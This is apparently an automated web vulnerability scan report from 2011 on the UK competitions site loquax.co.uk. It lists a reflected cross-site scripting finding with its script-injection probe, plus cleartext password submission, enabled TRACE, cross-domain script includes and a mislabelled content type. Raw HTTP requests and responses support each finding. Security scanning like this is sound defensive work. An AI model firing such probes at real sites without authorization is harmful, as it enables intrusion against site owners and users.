1. Cross-site scripting (reflected)
2. Cleartext submission of password
3. Password field with autocomplete enabled
4. Cross-domain script include
7. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://www.loquax.co.uk |
Path: | /competitions/ |
GET /competitions/?14dba"><script>alert(1)< Host: www.loquax.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=00d69d |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:04:07 GMT Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6 mod_perl/1.29 X-Powered-By: PHP/4.4.4-8+etch6 Set-Cookie: bblastactivity=0; expires=Thursday, 17-May-12 13:04:07 GMT; path=/; domain=.loquax.co.uk Cache-Control: private Pragma: private X-UA-Compatible: IE=7 Vary: Accept-Encoding Content-Type: text/html; charset=ISO-8859-1 Content-Length: 25485 <HTML><HEAD><meta http-equiv="X-UA <TITLE>Competitions UK - Updated UK Competitions for 18th May</TITLE> <META NAME="DESCRIPTION" CONTENT="New compet ...[SNIP]... <input type="hidden" name="url" value="http://your.loquax ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.loquax.co.uk |
Path: | /competitions/ |
GET /competitions/ HTTP/1.1 Host: www.loquax.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=00d69d |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:03:03 GMT Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6 mod_perl/1.29 X-Powered-By: PHP/4.4.4-8+etch6 Set-Cookie: bblastactivity=0; expires=Thursday, 17-May-12 13:03:03 GMT; path=/; domain=.loquax.co.uk Cache-Control: private Pragma: private X-UA-Compatible: IE=7 Vary: Accept-Encoding Content-Type: text/html; charset=ISO-8859-1 Content-Length: 25357 <HTML><HEAD><meta http-equiv="X-UA <TITLE>Competitions UK - Updated UK Competitions for 18th May</TITLE> <META NAME="DESCRIPTION" CONTENT="New compet ...[SNIP]... <TR> <form action="http://forums <TD class=tmainline> ...[SNIP]... <br><input type="password" class="dropdown" name="vb_login_password" size="10" accesskey="p" tabindex="2" /> <br> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.loquax.co.uk |
Path: | /competitions/ |
GET /competitions/ HTTP/1.1 Host: www.loquax.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=00d69d |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:03:03 GMT Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6 mod_perl/1.29 X-Powered-By: PHP/4.4.4-8+etch6 Set-Cookie: bblastactivity=0; expires=Thursday, 17-May-12 13:03:03 GMT; path=/; domain=.loquax.co.uk Cache-Control: private Pragma: private X-UA-Compatible: IE=7 Vary: Accept-Encoding Content-Type: text/html; charset=ISO-8859-1 Content-Length: 25357 <HTML><HEAD><meta http-equiv="X-UA <TITLE>Competitions UK - Updated UK Competitions for 18th May</TITLE> <META NAME="DESCRIPTION" CONTENT="New compet ...[SNIP]... <TR> <form action="http://forums <TD class=tmainline> ...[SNIP]... <br><input type="password" class="dropdown" name="vb_login_password" size="10" accesskey="p" tabindex="2" /> <br> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.loquax.co.uk |
Path: | /competitions/ |
GET /competitions/ HTTP/1.1 Host: www.loquax.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=00d69d |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:03:03 GMT Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6 mod_perl/1.29 X-Powered-By: PHP/4.4.4-8+etch6 Set-Cookie: bblastactivity=0; expires=Thursday, 17-May-12 13:03:03 GMT; path=/; domain=.loquax.co.uk Cache-Control: private Pragma: private X-UA-Compatible: IE=7 Vary: Accept-Encoding Content-Type: text/html; charset=ISO-8859-1 Content-Length: 25357 <HTML><HEAD><meta http-equiv="X-UA <TITLE>Competitions UK - Updated UK Competitions for 18th May</TITLE> <META NAME="DESCRIPTION" CONTENT="New compet ...[SNIP]... <link rel="stylesheet" href="http://www.loquax <script src="http://yui.yahooapis <script src="http://yui.yahooapis <script src="http://yui.yahooapis ...[SNIP]... <P> <script type="text/javascript" src="http://media ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.loquax.co.uk |
Path: | / |
TRACE / HTTP/1.0 Host: www.loquax.co.uk Cookie: 8ec8ea86c27a551e |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:03:03 GMT Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6 mod_perl/1.29 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Cookie: 8ec8ea86c27a551e Host: www.loquax.co.uk |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.loquax.co.uk |
Path: | /competitions/ |
GET /robots.txt HTTP/1.0 Host: www.loquax.co.uk |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:03:04 GMT Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6 mod_perl/1.29 Last-Modified: Wed, 21 Apr 2010 07:45:21 GMT ETag: "485bdd-7f0-4bcead11" Accept-Ranges: bytes Content-Length: 2032 Connection: close Content-Type: text/plain; charset=iso-8859-1 # robots.txt for loquax.co.uk User-agent: htdig/3.1.2 (htdig@loquax.co.uk) Disallow: User-agent: ggbot Disallow: / User-agent: aipbot Disallow: / User-agent: psbot Disallow: / User-agent: niXXieB ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.loquax.co.uk |
Path: | /forumducks08.jpg |
GET /forumducks08.jpg HTTP/1.1 Host: www.loquax.co.uk Proxy-Connection: keep-alive Referer: http://offers.loquax.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=00d69d |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:03:09 GMT Server: Apache/1.3.34 (Debian) PHP/4.4.4-8+etch6 mod_perl/1.29 Last-Modified: Wed, 17 Jun 2009 08:35:12 GMT ETag: "485cb0-3a1c-4a38aac0" Accept-Ranges: bytes Content-Length: 14876 Content-Type: image/jpeg GIF89ax........G...P0...G .....2..F........%..J.... ...[SNIP]... |